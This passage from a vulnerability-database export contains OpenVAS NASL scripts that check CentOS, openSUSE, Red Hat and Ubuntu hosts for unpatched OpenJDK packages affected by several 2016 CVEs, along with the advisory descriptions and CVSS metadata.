script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.39~1.13.11.0.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.39~1.13.11.0.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.39~1.13.11.0.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.39~1.13.11.0.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.39~1.13.11.0.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2016:1235-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851291", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851291\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-06 15:29:28 +0530 (Fri, 06 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2016:1235-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for java-1_7_0-openjdk to version 2.6.6 fixes five security\n issues.\n\n These security issues were fixed:\n\n - CVE-2016-0686: Ensure thread consistency (bsc#976340).\n\n - CVE-2016-0687: Better byte behavior (bsc#976340).\n\n - CVE-2016-0695: Make DSA more fair (bsc#976340).\n\n - CVE-2016-3425: Better buffering of XML strings (bsc#976340).\n\n - CVE-2016-3427: Improve JMX connections (bsc#976340).\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1235-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-accessibility\", rpm:\"java-1_7_0-openjdk-accessibility~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless\", rpm:\"java-1_7_0-openjdk-headless~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless-debuginfo\", rpm:\"java-1_7_0-openjdk-headless-debuginfo~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.101~24.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:41", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-04-22T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2016:0675-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871600", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871600", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2016:0675-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871600\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-22 05:16:37 +0200 (Fri, 22 Apr 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2016:0675-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.7.0-openjdk packages provide the\nOpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise\nLinux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0675-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-April/msg00031.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.101~2.6.6.1.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:55:58", "description": "Check the version of java", "cvss3": {}, "published": "2016-04-22T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2016:0676 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310882467", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882467", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882467\");\n script_version(\"2020-03-13T10:06:41+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 10:06:41 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-22 05:17:03 +0200 (Fri, 22 Apr 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for java CESA-2016:0676 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of java\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.7.0-openjdk packages provide the\nOpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\");\n script_tag(name:\"affected\", value:\"java on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0676\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-April/021841.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-accessibility\", rpm:\"java-1.7.0-openjdk-accessibility~1.7.0.101~2.6.6.1.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-headless\", rpm:\"java-1.7.0-openjdk-headless~1.7.0.101~2.6.6.1.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-06T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-7 USN-2964-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842733", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842733", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for openjdk-7 USN-2964-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842733\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-06 05:19:01 +0200 (Fri, 06 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-3427\", \"CVE-2016-0695\", \"CVE-2016-3425\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for openjdk-7 USN-2964-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openjdk-7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were discovered\n in the OpenJDK JRE related to information disclosure, data integrity, and\n availability. An attacker could exploit these to cause a denial of service,\n expose sensitive data over the network, or possibly execute arbitrary code.\n (CVE-2016-0686, CVE-2016-0687, CVE-2016-3427)\n\n A vulnerability was discovered in the OpenJDK JRE related to information\n disclosure. An attacker could exploit this to expose sensitive data over\n the network. (CVE-2016-0695)\n\n A vulnerability was discovered in the OpenJDK JRE related to availability.\n An attacker could exploit this to cause a denial of service.\n (CVE-2016-3425)\");\n script_tag(name:\"affected\", value:\"openjdk-7 on Ubuntu 15.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2964-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2964-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm:i386\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm:amd64\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jdk:i386\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jdk:amd64\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre:i386\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre:amd64\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless:i386\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless:amd64\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero:i386\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero:amd64\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-source\", ver:\"7u101-2.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm:i386\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm:amd64\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jdk:i386\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jdk:amd64\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre:i386\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre:amd64\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless:i386\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless:amd64\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero:i386\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero:amd64\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-source\", ver:\"7u101-2.6.6-0ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-04-22T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2016:0676-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 